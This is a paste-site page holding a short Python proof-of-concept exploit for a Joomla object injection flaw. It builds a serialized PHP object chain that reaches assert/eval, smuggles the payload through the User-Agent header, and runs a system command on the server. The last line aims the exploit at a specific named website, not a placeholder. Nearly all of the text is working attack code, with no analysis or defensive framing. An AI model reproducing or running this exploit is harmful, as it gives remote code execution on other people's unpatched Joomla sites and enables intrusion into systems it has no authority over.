Welcome! Here you can paste sources and general debugging text, You can even set yourself a password if you want to keep it just for yourself.

Posted by Anonymous on January Mon 4th 2:23 AM - Never Expires
Download | New paste

  1. '''
  2.    Simple PoC for Joomla Object Injection.
  3.    Gary @ Sec-1 ltd
  4.    http://www.sec-1.com/
  5. '''
  6.  
  7. import requests #  easy_install requests
  8.  
  9. def get_url(url, user_agent):
  10.  
  11.     headers = {
  12.     'User-Agent': user_agent
  13.     }
  14.     cookies = requests.get(url,headers=headers).cookies
  15.     for _ in range(3):
  16.         response = requests.get(url, headers=headers,cookies=cookies)   
  17.     return response
  18.    
  19. def php_str_noquotes(data):
  20.     "Convert string to chr(xx).chr(xx) for use in php"
  21.     encoded = ""
  22.     for char in data:
  23.         encoded += "chr({0}).".format(ord(char))
  24.  
  25.     return encoded[:-1]
  26.  
  27.  
  28. def generate_payload(php_payload):
  29.  
  30.     php_payload = "eval({0})".format(php_str_noquotes(php_payload))
  31.  
  32.     terminate = '\xf0\xfd\xfd\xfd';
  33.     exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
  34.     injected_payload = "{};JFactory::getConfig();exit".format(php_payload)   
  35.     exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
  36.     exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
  37.  
  38.     return exploit_template
  39.  
  40.  
  41.  
  42. pl = generate_payload("system('touch /tmp/hs.txt');")
  43. print get_url("http://agonigrami.gr", pl)
Language:
To highlight particular lines, prefix each line with @@





Hosted by KanGouLya for OpenTunisia
Donate for OpenTunisia Servers.
Powered by PHPaste 1.1